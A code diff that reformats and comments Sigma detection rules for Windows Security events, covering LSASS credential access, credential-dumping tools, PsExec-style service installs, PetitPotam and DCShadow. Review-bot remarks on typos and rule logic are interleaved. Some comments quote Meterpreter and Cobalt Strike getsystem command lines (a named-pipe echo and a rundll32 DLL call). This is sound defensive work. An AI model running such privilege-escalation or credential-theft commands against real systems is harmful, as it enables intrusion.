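Review bot: The joined description line in win_security_lm_namedpipe.yml keeps two wording errors from the folded original: `namped pipes` for `named pipes`, and `notify` where the subject is the detection, so `notifies`. Since the commit rewrites this line anyway, it could read `description: This detection excludes known named pipes accessible remotely and notifies on newly observed ones, which may help to detect lateral movement and remote execution using named pipes`.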
@@ -15,14 +13,13 @@ tags: logsource: product: windows service: security - definition: The advanced audit policy setting "Object Access > Audit Detailed - File Share" must be configured for Success/Failure + definition: The advanced audit policy setting "Object Access > Audit Detailed File Share" must be configured for Success/Failure detection: security: Channel: Security selection1: EventID: 5145 - ShareName: \\\\\*\\IPC$ + ShareName: \\\\\*\\IPC$ # looking for the string \\*\IPC$ false_positives: RelativeTargetName: - atsvc @@ -47,7 +44,6 @@ detection: - eventlog condition: security and (selection1 and not false_positives) falsepositives: - - Update the excluded named pipe to filter out any newly observed legit named - pipe + - Update the excluded named pipe to filter out any newly observed legit named pipe level: high ruletype: Sigma diff --git a/sigma/builtin/security/win_security_lsass_access_non_system_account.yml b/sigma/builtin/security/win_security_lsass_access_non_system_account.yml index a4db591c0..a9f693446 100644 --- a/sigma/builtin/security/win_security_lsass_access_non_system_account.yml +++ b/sigma/builtin/security/win_security_lsass_access_non_system_account.yml @@ -1,8 +1,7 @@ title: LSASS Access From Non System Account id: 962fe167-e48d-4fd6-9974-11e5b9a5d6d1 status: test -description: Detects potential mimikatz-like tools accessing LSASS from non system - account +description: Detects potential mimikatz-like tools accessing LSASS from non system account references: - https://threathunterplaybook.com/hunts/windows/170105-LSASSMemoryReadAccess/notebook.html author: Roberto Rodriguez @Cyb3rWard0g 
@@ -23,28 +22,30 @@ detection: - 4656 AccessMask: - '0x100000' - - '0x1010' + - '0x1010' # car.2019-04-004 - '0x1400' - - '0x1410' - - '0x1418' - - '0x1438' - - '0x143a' + - '0x1410' # car.2019-04-004 + - '0x1418' # car.2019-04-004 + - '0x1438' # car.2019-04-004 + - '0x143a' # car.2019-04-004 - '0x1f0fff' - '0x1f1fff' - '0x1f2fff' - '0x1f3fff' - '0x40' - - 143a + - 143a # car.2019-04-004 - 1f0fff - 1f1fff - 1f2fff - 1f3fff + # - '0x1000' # minimum access requirements to query basic info from service ObjectType: Process ObjectName|endswith: \lsass.exe filter_main_service_account: SubjectUserName|endswith: $ filter_main_generic: ProcessName|contains: + # Legitimate AV and EDR solutions - :\Program Files\ - :\Program Files (x86)\ filter_main_wmiprvse: diff --git a/sigma/builtin/security/win_security_mal_creddumper.yml b/sigma/builtin/security/win_security_mal_creddumper.yml index 351947c21..ebc659496 100644 --- a/sigma/builtin/security/win_security_mal_creddumper.yml +++ b/sigma/builtin/security/win_security_mal_creddumper.yml @@ -1,15 +1,13 @@ title: Credential Dumping Tools Service Execution - Security id: f0d1feba-4344-4ca9-8121-a6c97bd6df52 related: - - id: 4976aa50-8f41-45c6-8b15-ab3fc10e79ed - type: derived + - id: 4976aa50-8f41-45c6-8b15-ab3fc10e79ed + type: derived status: test -description: Detects well-known credential dumping tools execution via service execution - events +description: Detects well-known credential dumping tools execution via service execution events references: - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment -author: Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, - oscd.community +author: Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community date: 2017/03/05 modified: 2022/11/29 tags: 
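Review bot: The new `# Legitimate AV and EDR solutions` comment on `filter_main_generic` in win_security_lsass_access_non_system_account.yml names the intent but not what the filter does: `ProcessName|contains` with `:\Program Files\` and `:\Program Files (x86)\` suppresses every process under those trees, not only security products. Someone tuning the rule should see that this is a path-based exclusion whose safety depends on those directories being writable only by administrators, e.g. `# Path-based exclusion for AV/EDR installed under Program Files; every process in these trees is suppressed - narrow to vendor subfolders where the environment allows`. The commented-out `# - '0x1000'` entry is useful, but its trailing remark speaks of a service while the objects matched here are processes (`ObjectType: Process`), so `query limited information from the process` would fit the rule better.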
@@ -25,8 +23,7 @@ tags: logsource: product: windows service: security - definition: The 'System Security Extension' audit subcategory need to be enabled - to log the EID 4697 + definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697 detection: security: Channel: Security diff --git a/sigma/builtin/security/win_security_mal_service_installs.yml b/sigma/builtin/security/win_security_mal_service_installs.yml index f8faf560e..bd97078f3 100644 --- a/sigma/builtin/security/win_security_mal_service_installs.yml +++ b/sigma/builtin/security/win_security_mal_service_installs.yml @@ -1,11 +1,10 @@ title: Malicious Service Installations id: cb062102-587e-4414-8efa-dbe3c7bf19c6 related: - - id: 2cfe636e-317a-4bee-9f2c-1066d9f54d1a - type: derived + - id: 2cfe636e-317a-4bee-9f2c-1066d9f54d1a + type: derived status: test -description: Detects known malicious service installs that only appear in cases of - lateral movement, credential dumping, and other suspicious activities. +description: Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities. references: - https://awakesecurity.com/blog/threat-hunting-for-paexec/ - https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html @@ -23,8 +22,7 @@ tags: logsource: product: windows service: security - definition: The 'System Security Extension' audit subcategory need to be enabled - to log the EID 4697 + definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697 detection: security: Channel: Security diff --git a/sigma/builtin/security/win_security_mal_wceaux_dll.yml b/sigma/builtin/security/win_security_mal_wceaux_dll.yml index 8942cf4cd..cb945c3d1 100644 --- a/sigma/builtin/security/win_security_mal_wceaux_dll.yml +++ b/sigma/builtin/security/win_security_mal_wceaux_dll.yml 
@@ -1,8 +1,7 @@ title: WCE wceaux.dll Access id: 1de68c67-af5c-4097-9c85-fe5578e09e67 status: test -description: Detects wceaux.dll access while WCE pass-the-hash remote command execution - on source host +description: Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host references: - https://www.jpcert.or.jp/english/pub/sr/ir_research.html - https://jpcertcc.github.io/ToolAnalysisResultSheet diff --git a/sigma/builtin/security/win_security_metasploit_authentication.yml b/sigma/builtin/security/win_security_metasploit_authentication.yml index 168c29381..a9fd4ea8b 100644 --- a/sigma/builtin/security/win_security_metasploit_authentication.yml +++ b/sigma/builtin/security/win_security_metasploit_authentication.yml @@ -24,7 +24,7 @@ detection: AuthenticationPackageName: NTLM WorkstationName|re: ^[A-Za-z0-9]{16}$ selection2: - ProcessName: null + ProcessName: EventID: 4776 Workstation|re: ^[A-Za-z0-9]{16}$ condition: security and (1 of selection*) diff --git a/sigma/builtin/security/win_security_metasploit_or_impacket_smb_psexec_service_install.yml b/sigma/builtin/security/win_security_metasploit_or_impacket_smb_psexec_service_install.yml index 4d0b40ff2..35a81e9da 100644 --- a/sigma/builtin/security/win_security_metasploit_or_impacket_smb_psexec_service_install.yml +++ b/sigma/builtin/security/win_security_metasploit_or_impacket_smb_psexec_service_install.yml 
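Review bot: `ProcessName:` with no value in selection2 of win_security_metasploit_authentication.yml now relies on YAML resolving an empty scalar to null, whereas the removed `ProcessName: null` stated the Sigma "field is null/absent" semantics explicitly. The two forms should parse identically, but the bare key reads like an unfinished line to anyone editing the rule later, so keeping `ProcessName: null` or annotating it, `ProcessName: # must be absent in the 4776 event`, would be clearer.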
@@ -1,11 +1,10 @@ title: Metasploit Or Impacket Service Installation Via SMB PsExec id: 6fb63b40-e02a-403e-9ffd-3bcc1d749442 related: - - id: 1a17ce75-ff0d-4f02-9709-2b7bb5618cf0 - type: derived + - id: 1a17ce75-ff0d-4f02-9709-2b7bb5618cf0 + type: derived status: test -description: Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and - Impacket psexec.py by triggering on specific service installation +description: Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation references: - https://bczyz1.github.io/2021/01/30/psexec.html author: Bartlomiej Czyz, Relativity @@ -20,8 +19,7 @@ tags: logsource: product: windows service: security - definition: The 'System Security Extension' audit subcategory need to be enabled - to log the EID 4697 + definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697 detection: security: Channel: Security @@ -29,7 +27,7 @@ detection: EventID: 4697 ServiceFileName|re: ^%systemroot%\\[a-zA-Z]{8}\.exe$ ServiceName|re: (^[a-zA-Z]{4}$)|(^[a-zA-Z]{8}$)|(^[a-zA-Z]{16}$) - ServiceStartType: 3 + ServiceStartType: 3 # on-demand start, see https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4697 ServiceType: '0x10' filter: ServiceName: PSEXESVC @@ -41,7 +39,6 @@ fields: - ServiceName - ServiceFileName falsepositives: - - Possible, different agents with a 8 character binary and a 4, 8 or 16 character - service name + - Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name level: high ruletype: Sigma diff --git a/sigma/builtin/security/win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml b/sigma/builtin/security/win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml index f5aec11a9..7114f6b51 100644 --- a/sigma/builtin/security/win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml 
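Review bot: In the `@@ -29,7 +27,7 @@` hunk of win_security_metasploit_or_impacket_smb_psexec_service_install.yml the new `ServiceStartType: 3 # on-demand start, …` comment is helpful, but the `ServiceFileName|re: ^%systemroot%\\[a-zA-Z]{8}\.exe$` line two lines above is case-sensitive under Sigma's plain `re` modifier unless the backend folds case, and the logged service path may carry the environment variable in upper case; if Hayabusa does not add a case-insensitive flag for `re`, the selection would silently miss, which is worth confirming against a sample 4697 event and, if needed, writing `(?i)^%systemroot%\\[a-zA-Z]{8}\.exe$`. The rejoined falsepositives entry in the last hunk could also fix its grammar: `- Possible, different agents with an 8-character binary and a 4, 8 or 16 character service name`.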
+++ b/sigma/builtin/security/win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml @@ -1,11 +1,10 @@ title: Meterpreter or Cobalt Strike Getsystem Service Installation - Security id: ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34 related: - - id: 843544a7-56e0-4dcc-a44f-5cc266dd97d6 - type: derived + - id: 843544a7-56e0-4dcc-a44f-5cc266dd97d6 + type: derived status: test -description: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting - a specific service installation +description: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation references: - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment - https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/ @@ -19,14 +18,16 @@ tags: logsource: product: windows service: security - definition: The 'System Security Extension' audit subcategory need to be enabled - to log the EID 4697 + definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697 detection: security: Channel: Security selection_eid: EventID: 4697 selection_cli_cmd: + # meterpreter getsystem technique 1: cmd.exe /c echo 559891bb017 > \\.\pipe\5e120a + # cobaltstrike getsystem technique 1: %COMSPEC% /c echo 559891bb017 > \\.\pipe\5e120a + # cobaltstrike getsystem technique 1b (expanded %COMSPEC%): %COMSPEC% /c echo 559891bb017 > \\.\pipe\5e120a ServiceFileName|contains|all: - /c - echo 
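Review bot: The third comment added under `selection_cli_cmd`, `# cobaltstrike getsystem technique 1b (expanded %COMSPEC%): %COMSPEC% /c echo …`, shows exactly the same string as technique 1 although its label says the variable is expanded, so it documents nothing new and may confuse a reader checking what the `cmd` entry in the `contains|all` list (just outside this hunk) is meant to match. Either show the example with `%COMSPEC%` replaced by the cmd.exe path it expands to, or drop the duplicate line; a short lead-in such as `# illustrative ServiceFileName values seen in the referenced write-ups` would also make clear the strings are examples rather than exact match values.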
@@ -35,12 +36,13 @@ detection: - cmd - '%COMSPEC%' selection_cli_rundll: + # meterpreter getsystem technique 2: rundll32.exe C:\Users\test\AppData\Local\Temp\tmexsn.dll,a /p:tmexsn ServiceFileName|contains|all: - rundll32 - .dll,a - '/p:' selection_cli_share: - ServiceFileName|startswith: \\\\127.0.0.1\\ADMIN$\ + ServiceFileName|startswith: \\\\127.0.0.1\\ADMIN$\ # https://twitter.com/svch0st/status/1413688851877416960?lang=en condition: security and (selection_eid and 1 of selection_cli_*) falsepositives: - Unlikely diff --git a/sigma/builtin/security/win_security_net_ntlm_downgrade.yml b/sigma/builtin/security/win_security_net_ntlm_downgrade.yml index ad2bb9165..c07dcfa94 100644 --- a/sigma/builtin/security/win_security_net_ntlm_downgrade.yml +++ b/sigma/builtin/security/win_security_net_ntlm_downgrade.yml @@ -1,8 +1,8 @@ title: NetNTLM Downgrade Attack id: d3abac66-f11c-4ed0-8acb-50cc29c97eed related: - - id: d67572a0-e2ec-45d6-b8db-c100d14b8ef2 - type: derived + - id: d67572a0-e2ec-45d6-b8db-c100d14b8ef2 + type: derived status: test description: Detects NetNTLM downgrade attack references: @@ -14,6 +14,7 @@ tags: - attack.defense_evasion - attack.t1562.001 - attack.t1112 +# Windows Security Eventlog: Process Creation with Full Command Line logsource: product: windows service: security diff --git a/sigma/builtin/security/win_security_net_share_obj_susp_desktop_ini.yml b/sigma/builtin/security/win_security_net_share_obj_susp_desktop_ini.yml index 13fd4698c..63bb5ec18 100644 --- a/sigma/builtin/security/win_security_net_share_obj_susp_desktop_ini.yml +++ b/sigma/builtin/security/win_security_net_share_obj_susp_desktop_ini.yml 
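Review bot: In win_security_net_ntlm_downgrade.yml the new top-level comment `# Windows Security Eventlog: Process Creation with Full Command Line` sits directly above a `logsource` of `service: security` in a rule tagged `attack.t1112` (Modify Registry), and the detection block that would show which event it keys on is outside this hunk. If the rule matches registry value changes rather than process creation, the comment is misleading and should be reworded to name the event and audit subcategory the detection actually relies on, in the same style as the `definition:` lines used elsewhere in this patch.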
@@ -1,9 +1,7 @@ title: Windows Network Access Suspicious desktop.ini Action id: 35bc7e28-ee6b-492f-ab04-da58fcf6402e status: test -description: Detects unusual processes accessing desktop.ini remotely over network - share, which can be leveraged to alter how Explorer displays a folder's content - (i.e. renaming files) without changing them on disk. +description: Detects unusual processes accessing desktop.ini remotely over network share, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk. references: - https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/ author: Tim Shelton (HAWK.IO) diff --git a/sigma/builtin/security/win_security_new_or_renamed_user_account_with_dollar_sign.yml b/sigma/builtin/security/win_security_new_or_renamed_user_account_with_dollar_sign.yml index 4dfacad32..8aa36b721 100644 --- a/sigma/builtin/security/win_security_new_or_renamed_user_account_with_dollar_sign.yml +++ b/sigma/builtin/security/win_security_new_or_renamed_user_account_with_dollar_sign.yml @@ -15,10 +15,10 @@ detection: security: Channel: Security selection1: - EventID: 4720 + EventID: 4720 # create user SamAccountName|contains: $ selection2: - EventID: 4781 + EventID: 4781 # rename user NewTargetUserName|contains: $ condition: security and (1 of selection*) fields: diff --git a/sigma/builtin/security/win_security_not_allowed_rdp_access.yml b/sigma/builtin/security/win_security_not_allowed_rdp_access.yml index a10904d33..6f7b294cd 100644 --- a/sigma/builtin/security/win_security_not_allowed_rdp_access.yml +++ b/sigma/builtin/security/win_security_not_allowed_rdp_access.yml 
@@ -1,13 +1,9 @@ title: Denied Access To Remote Desktop id: 8e5c03fa-b7f0-11ea-b242-07e0576828d9 status: test -description: 'This event is generated when an authenticated user who is not allowed - to log on remotely attempts to connect to this computer through Remote Desktop. - - Often, this event can be generated by attackers when searching for available windows - servers in the network. - - ' +description: | + This event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop. + Often, this event can be generated by attackers when searching for available windows servers in the network. references: - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=4825 author: Pushkarev Dmitry diff --git a/sigma/builtin/security/win_security_password_policy_enumerated.yml b/sigma/builtin/security/win_security_password_policy_enumerated.yml index 1109b3a6c..850cf1be8 100644 --- a/sigma/builtin/security/win_security_password_policy_enumerated.yml +++ b/sigma/builtin/security/win_security_password_policy_enumerated.yml @@ -18,8 +18,8 @@ detection: security: Channel: Security selection: - EventID: 4661 - AccessList|contains: '%%5392' + EventID: 4661 # A handle to an object was requested. + AccessList|contains: '%%5392' # ReadPasswordParameters ObjectServer: Security Account Manager condition: security and selection level: medium diff --git a/sigma/builtin/security/win_security_pcap_drivers.yml b/sigma/builtin/security/win_security_pcap_drivers.yml index d99669b76..a09db69fc 100644 --- a/sigma/builtin/security/win_security_pcap_drivers.yml +++ b/sigma/builtin/security/win_security_pcap_drivers.yml 
@@ -1,8 +1,7 @@
 title: Windows Pcap Drivers
 id: 7b687634-ab20-11ea-bb37-0242ac130002
 status: test
-description: Detects Windows Pcap driver installation based on a list of associated
- .sys files.
+description: Detects Windows Pcap driver installation based on a list of associated .sys files.
 references:
 - https://ragged-lab.blogspot.com/2020/06/capturing-pcap-driver-installations.html#more
 author: Cian Heasley
@@ -15,8 +14,7 @@ tags:
 logsource:
 product: windows
 service: security
- definition: The 'System Security Extension' audit subcategory need to be enabled
- to log the EID 4697
+ definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697
 detection:
 security:
 Channel: Security
diff --git a/sigma/builtin/security/win_security_petitpotam_network_share.yml b/sigma/builtin/security/win_security_petitpotam_network_share.yml
index 94c7b4d90..680c9f12f 100644
--- a/sigma/builtin/security/win_security_petitpotam_network_share.yml
+++ b/sigma/builtin/security/win_security_petitpotam_network_share.yml
@@ -14,14 +14,13 @@ tags:
 logsource:
 product: windows
 service: security
- definition: The advanced audit policy setting "Object Access > Detailed File Share"
- must be configured for Success/Failure
+ definition: The advanced audit policy setting "Object Access > Detailed File Share" must be configured for Success/Failure
 detection:
 security:
 Channel: Security
 selection:
 EventID: 5145
- ShareName|startswith: \\\\
+ ShareName|startswith: \\\\ # looking for the string \\somethink\IPC$
 ShareName|endswith: \IPC$
 RelativeTargetName: lsarpc
 SubjectUserName: ANONYMOUS LOGON
diff --git a/sigma/builtin/security/win_security_petitpotam_susp_tgt_request.yml b/sigma/builtin/security/win_security_petitpotam_susp_tgt_request.yml
index a56617db1..b66024c49 100644
--- a/sigma/builtin/security/win_security_petitpotam_susp_tgt_request.yml
+++ b/sigma/builtin/security/win_security_petitpotam_susp_tgt_request.yml
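Review bot: The comment added to `ShareName|startswith: \\\\` in win_security_petitpotam_network_share.yml misspells its example path: `\\somethink\IPC$` should be `\\something\IPC$`, so the line would read `ShareName|startswith: \\\\ # looking for the string \\something\IPC$`. The comment is the only place the rule explains why the share prefix and the `\IPC$` suffix are matched by two separate fields, so it is worth keeping accurate. The other hunks on this line only reflow text.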
@@ -1,22 +1,12 @@
 title: PetitPotam Suspicious Kerberos TGT Request
 id: 6a53d871-682d-40b6-83e0-b7c1a6c4e3a5
 status: test
-description: 'Detect suspicious Kerberos TGT requests.
-
- Once an attacer obtains a computer certificate by abusing Active Directory Certificate
- Services in combination with PetitPotam, the next step would be to leverage the
- certificate for malicious purposes.
-
- One way of doing this is to request a Kerberos Ticket Granting Ticket using a
- tool like Rubeus.
-
- This request will generate a 4768 event with some unusual fields depending on
- the environment.
-
- This analytic will require tuning, we recommend filtering Account_Name to the
- Domain Controller computer accounts.
-
- '
+description: |
+ Detect suspicious Kerberos TGT requests.
+ Once an attacer obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes.
+ One way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus.
+ This request will generate a 4768 event with some unusual fields depending on the environment.
+ This analytic will require tuning, we recommend filtering Account_Name to the Domain Controller computer accounts.
 references:
 - https://github.com/topotam/PetitPotam
 - https://isc.sans.edu/forums/diary/Active+Directory+Certificate+Services+ADCS+PKI+domain+admin+vulnerability/27668/
@@ -30,8 +20,7 @@ tags:
 logsource:
 product: windows
 service: security
- definition: The advanced audit policy setting "Account Logon > Kerberos Authentication
- Service" must be configured for Success/Failure
+ definition: The advanced audit policy setting "Account Logon > Kerberos Authentication Service" must be configured for Success/Failure
 detection:
 security:
 Channel: Security
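Review bot: The rewritten block-scalar description keeps the typo `attacer` in its second line; since this commit already rewrites every line of that scalar, the line should read `Once an attacker obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes.`. The same description ends with the tuning advice that the `falsepositives` entry (hunk at -45, also reflowed here) repeats almost verbatim, so any later edit should touch both places.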
@@ -45,7 +34,6 @@ detection:
 CertThumbprint: ''
 condition: security and (selection and not 1 of filter_*)
 falsepositives:
- - False positives are possible if the environment is using certificates for authentication.
- We recommend filtering Account_Name to the Domain Controller computer accounts.
+ - False positives are possible if the environment is using certificates for authentication. We recommend filtering Account_Name to the Domain Controller computer accounts.
 level: high
 ruletype: Sigma
diff --git a/sigma/builtin/security/win_security_possible_dc_shadow.yml b/sigma/builtin/security/win_security_possible_dc_shadow.yml
index e1621c296..bad5c1181 100644
--- a/sigma/builtin/security/win_security_possible_dc_shadow.yml
+++ b/sigma/builtin/security/win_security_possible_dc_shadow.yml
@@ -1,8 +1,8 @@
 title: Possible DC Shadow Attack
 id: 32e19d25-4aed-4860-a55a-be99cb0bf7ed
 related:
- - id: 611eab06-a145-4dfa-a295-3ccc5c20f59a
- type: derived
+ - id: 611eab06-a145-4dfa-a295-3ccc5c20f59a
+ type: derived
 status: test
 description: Detects DCShadow via create new SPN
 references:
@@ -18,14 +18,7 @@ tags:
 logsource:
 product: windows
 service: security
- definition: The "Audit Directory Service Changes" logging policy must be configured
- in order to receive events. Audit events are generated only for objects with
- configured system access control lists (SACLs). Audit events are generated
- only for objects with configured system access control lists (SACLs) and only
- when accessed in a manner that matches their SACL settings. This policy covers
- the following events ids - 5136, 5137, 5138, 5139, 5141. Note that the default
- policy does not cover User objects. For that a custom AuditRule need to be
- setup (See https://github.com/OTRF/Set-AuditRule)
+ definition: The "Audit Directory Service Changes" logging policy must be configured in order to receive events. Audit events are generated only for objects with configured system access control lists (SACLs). Audit events are generated only for objects with configured system access control lists (SACLs) and only when accessed in a manner that matches their SACL settings. This policy covers the following events ids - 5136, 5137, 5138, 5139, 5141. Note that the default policy does not cover User objects. For that a custom AuditRule need to be setup (See https://github.com/OTRF/Set-AuditRule)
 detection:
 security:
 Channel: Security
diff --git a/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml b/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml
index 1953f2450..ba450504a 100644
--- a/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml
+++ b/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml
@@ -1,8 +1,8 @@
 title: PowerShell Scripts Installed as Services - Security
 id: 2a926e6a-4b81-4011-8a96-e36cc8c04302
 related:
- - id: a2e5019d-a658-4c6a-92bf-7197b54e2cae
- type: derived
+ - id: a2e5019d-a658-4c6a-92bf-7197b54e2cae
+ type: derived
 status: test
 description: Detects powershell script installed as a Service
 references:
@@ -16,8 +16,7 @@ tags:
 logsource:
 product: windows
 service: security
- definition: The 'System Security Extension' audit subcategory need to be enabled
- to log the EID 4697
+ definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697
 detection:
 security:
 Channel: Security
diff --git a/sigma/builtin/security/win_security_protected_storage_service_access.yml b/sigma/builtin/security/win_security_protected_storage_service_access.yml
index dea24af4d..a003d61a8 100644
--- a/sigma/builtin/security/win_security_protected_storage_service_access.yml
+++ b/sigma/builtin/security/win_security_protected_storage_service_access.yml
@@ -1,8 +1,7 @@
 title: Protected Storage Service Access
 id: 45545954-4016-43c6-855e-eae8f1c369dc
 status: test
-description: Detects access to a protected_storage service over the network. Potential
- abuse of DPAPI to extract domain backup keys from Domain Controllers
+description: Detects access to a protected_storage service over the network. Potential abuse of DPAPI to extract domain backup keys from Domain Controllers
 references:
 - https://threathunterplaybook.com/hunts/windows/190620-DomainDPAPIBackupKeyExtraction/notebook.html
 author: Roberto Rodriguez @Cyb3rWard0g
diff --git a/sigma/builtin/security/win_security_rdp_reverse_tunnel.yml b/sigma/builtin/security/win_security_rdp_reverse_tunnel.yml
index 7fb4b703f..fe9216644 100644
--- a/sigma/builtin/security/win_security_rdp_reverse_tunnel.yml
+++ b/sigma/builtin/security/win_security_rdp_reverse_tunnel.yml
@@ -1,8 +1,7 @@
 title: RDP over Reverse SSH Tunnel WFP
 id: 5bed80b6-b3e8-428e-a3ae-d3c757589e41
 status: test
-description: Detects svchost hosting RDP termsvcs communicating with the loopback
- address
+description: Detects svchost hosting RDP termsvcs communicating with the loopback address
 references:
 - https://twitter.com/SBousseaden/status/1096148422984384514
 - https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/44fbe85f72ee91582876b49678f9a26292a155fb/Command%20and%20Control/DE_RDP_Tunnel_5156.evtx
@@ -37,12 +36,11 @@ detection:
 - ::1
 filter_app_container:
 FilterOrigin: AppContainer Loopback
- filter_thor:
+ filter_thor: # checking BlueKeep vulnerability
 Application|endswith:
 - \thor.exe
 - \thor64.exe
- condition: security and (selection and ( sourceRDP or destinationRDP ) and not
- 1 of filter*)
+ condition: security and (selection and ( sourceRDP or destinationRDP ) and not 1 of filter*)
 falsepositives:
 - Programs that connect locally to the RDP port
 level: high
diff --git a/sigma/builtin/security/win_security_registry_permissions_weakness_check.yml b/sigma/builtin/security/win_security_registry_permissions_weakness_check.yml
index eb4c84431..c3f52f7eb 100644
--- a/sigma/builtin/security/win_security_registry_permissions_weakness_check.yml
+++ b/sigma/builtin/security/win_security_registry_permissions_weakness_check.yml
@@ -1,16 +1,10 @@
 title: Service Registry Key Read Access Request
 id: 11d00fff-5dc3-428c-8184-801f292faec0
 status: experimental
-description: 'Detects "read access" requests on the services registry key.
-
- Adversaries may execute their own malicious payloads by hijacking the Registry
- entries used by services.
-
- Adversaries may use flaws in the permissions for Registry keys related to services
- to redirect from the originally specified executable to one that they control,
- in order to launch their own code when a service starts.
-
- '
+description: |
+ Detects "read access" requests on the services registry key.
+ Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.
+ Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts.
 references:
 - https://center-for-threat-informed-defense.github.io/summiting-the-pyramid/analytics/service_registry_permissions_weakness_check/
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-1---service-registry-permissions-weakness
@@ -24,8 +18,7 @@ tags:
 logsource:
 product: windows
 service: security
- definition: 'Requirements: SACLs must be enabled for "READ_CONTROL" on the registry
- keys used in this rule'
+ definition: 'Requirements: SACLs must be enabled for "READ_CONTROL" on the registry keys used in this rule'
 detection:
 security:
 Channel: Security
@@ -34,7 +27,7 @@ detection:
 ObjectName|contains|all:
 - \SYSTEM\
 - ControlSet\Services\
- AccessList|contains: '%%1538'
+ AccessList|contains: '%%1538' # READ_CONTROL
 condition: security and selection
 falsepositives:
 - Likely from legitimate applications reading their key. Requires heavy tuning
diff --git a/sigma/builtin/security/win_security_remote_powershell_session.yml b/sigma/builtin/security/win_security_remote_powershell_session.yml
index b0286580d..8cf893cad 100644
--- a/sigma/builtin/security/win_security_remote_powershell_session.yml
+++ b/sigma/builtin/security/win_security_remote_powershell_session.yml
@@ -1,8 +1,7 @@
 title: Remote PowerShell Sessions Network Connections (WinRM)
 id: 13acf386-b8c6-4fe0-9a6e-c4756b974698
 status: test
-description: Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound
- connections to ports 5985 OR 5986
+description: Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986
 references:
 - https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html
 author: Roberto Rodriguez @Cyb3rWard0g
diff --git a/sigma/builtin/security/win_security_replay_attack_detected.yml b/sigma/builtin/security/win_security_replay_attack_detected.yml
index 488dc2247..faa8da3b5 100644
--- a/sigma/builtin/security/win_security_replay_attack_detected.yml
+++ b/sigma/builtin/security/win_security_replay_attack_detected.yml
@@ -1,8 +1,7 @@
 title: Replay Attack Detected
 id: 5a44727c-3b85-4713-8c44-4401d5499629
 status: test
-description: Detects possible Kerberos Replay Attack on the domain controllers when
- "KRB_AP_ERR_REPEAT" Kerberos response is sent to the client
+description: Detects possible Kerberos Replay Attack on the domain controllers when "KRB_AP_ERR_REPEAT" Kerberos response is sent to the client
 references:
 - https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md
 - https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4649
diff --git a/sigma/builtin/security/win_security_scm_database_handle_failure.yml b/sigma/builtin/security/win_security_scm_database_handle_failure.yml
index 491db370c..2c31728df 100644
--- a/sigma/builtin/security/win_security_scm_database_handle_failure.yml
+++ b/sigma/builtin/security/win_security_scm_database_handle_failure.yml
@@ -20,11 +20,13 @@ detection:
 EventID: 4656
 ObjectType: SC_MANAGER OBJECT
 ObjectName: ServicesActive
- AccessMask: '0xf003f'
+ AccessMask: '0xf003f' # is used in the reference; otherwise too many FPs
+ # Keywords: 'Audit Failure' <-> in the ref 'Keywords':-9214364837600034816
 filter:
 SubjectLogonId: '0x3e4'
 condition: security and (selection and not filter)
 falsepositives:
 - Unknown
+# triggering on many hosts in some environments
 level: medium
 ruletype: Sigma
diff --git a/sigma/builtin/security/win_security_service_install_remote_access_software.yml b/sigma/builtin/security/win_security_service_install_remote_access_software.yml
index 80288f8ef..03419834f 100644
--- a/sigma/builtin/security/win_security_service_install_remote_access_software.yml
+++ b/sigma/builtin/security/win_security_service_install_remote_access_software.yml
@@ -1,11 +1,10 @@
 title: Remote Access Tool Services Have Been Installed - Security
 id: c8b00925-926c-47e3-beea-298fd563728e
 related:
- - id: 1a31b18a-f00c-4061-9900-f735b96c99fc
- type: similar
+ - id: 1a31b18a-f00c-4061-9900-f735b96c99fc
